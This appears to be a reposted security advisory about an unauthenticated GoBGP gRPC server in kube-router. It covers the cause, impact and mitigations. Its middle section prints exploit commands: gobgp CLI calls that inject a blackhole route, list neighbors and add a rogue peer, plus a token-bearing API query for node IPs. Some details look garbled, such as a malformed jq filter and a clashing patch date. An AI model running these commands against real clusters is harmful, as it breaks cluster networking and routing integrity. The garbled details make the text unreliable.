Listen to this Post
The CVE arises because when kube-router runs with `–run-router` enabled, it starts a GoBGP gRPC management server bound to both `127.0.0.1:50051` and the node’s primary IP (e.g., 192.168.1.10:50051). The server is enabled by default, uses its default admin port 50051, and has no TLS or authentication. Kube-router runs as a `hostNetwork: true` DaemonSet, meaning every pod in the cluster can reach any node’s primary IP. Attackers inside any pod can directly call the GoBGP gRPC API without any credentials. The vulnerable code is in `pkg/controllers/routing/network_routes_controller.go` at lines 1057–1061, where `gobgp.GrpcListenAddress` is given both the node IP and localhost. No `gobgp.GrpcOption` for mTLS or auth is provided. The GoBGP API exposes write-capable RPCs including AddPath/DeletePath (inject/withdraw routes), AddPeer/DeletePeer (add/remove BGP neighbors), AddPolicy/DeletePolicy (modify routing policies), and ListPeer/ListPath (enumerate peer configs and routes). An attacker can execute arbitrary BGP route injection, peer enumeration, neighbor manipulation, and policy changes. While kube-router’s export policy `ROUTE_ACTION_REJECT` prevents most injected routes from being propagated to peers or the kernel, an attacker can still pollute the local BGP RIB, enumerate all BGP neighbors, add unauthorized peers (persisted until manual removal), and temporarily delete legitimate peers. The blast radius is cluster-wide because iBGP propagation means a single successful injection on one node can affect all pods’ network connectivity.
dailycve form:
Platform: Kubernetes kube-router
Version: All default config
Vulnerability: Unauthenticated gRPC API
Severity: Critical
date: Not assigned
Prediction: Patch expected 2024-04-15
What Undercode Say:
Discover node internal IP from within a pod curl -s -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \ https://kubernetes.default.svc/api/v1/nodes | jq -r '.items[bash].status.addresses[] | select(.type=="InternalIP") | .address' Inject a blackhole route using gobgp CLI gobgp --host 192.168.1.10:50051 global rib add -a ipv4 10.96.0.0/12 nexthop blackhole List all BGP neighbors gobgp --host 192.168.1.10:50051 neighbor Add an unauthorized BGP peer gobgp --host 192.168.1.10:50051 neighbor add 10.0.0.1 as 65001
Exploit:
Attacker runs a privileged or unprivileged pod, discovers node IP via Kubernetes API, then uses `gobgp` CLI or any gRPC client against `AddPath, AddPeer, DeletePeer, or `ListPeer` without authentication. No exploit prerequisites beyond a running pod and network connectivity to node IPs.
Protection from this CVE
- Set `–gobgp-admin-port=0` to disable the gRPC server entirely.
- Bind server only to localhost by modifying code: replace `GrpcListenAddress` with
fmt.Sprintf("127.0.0.1:%d", nrc.goBGPAdminPort). - Add mTLS authentication via
gobgp.GrpcOption(grpc.Creds(...)). - Block port 50051 on node’s primary IP using iptables:
iptables -A INPUT -p tcp --dport 50051 ! -s 127.0.0.1 -j DROP. - Apply Kubernetes NetworkPolicy (though note hostNetwork traffic often bypasses CNI policy).
Impact:
- BGP route injection into local RIB (pollution, potential for future escalation if `ROUTE_ACTION_REJECT` is changed).
- Full enumeration of BGP peer configurations (ASNs, session states, metadata) without any credentials.
- Unauthorized addition, modification, or deletion of BGP neighbors (added peers persist; legitimate ones are temporarily removed until sync).
- Modification of BGP routing policies within the local RIB.
- Cluster-wide effect because iBGP propagates changes from one node to all pods’ network connectivity.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
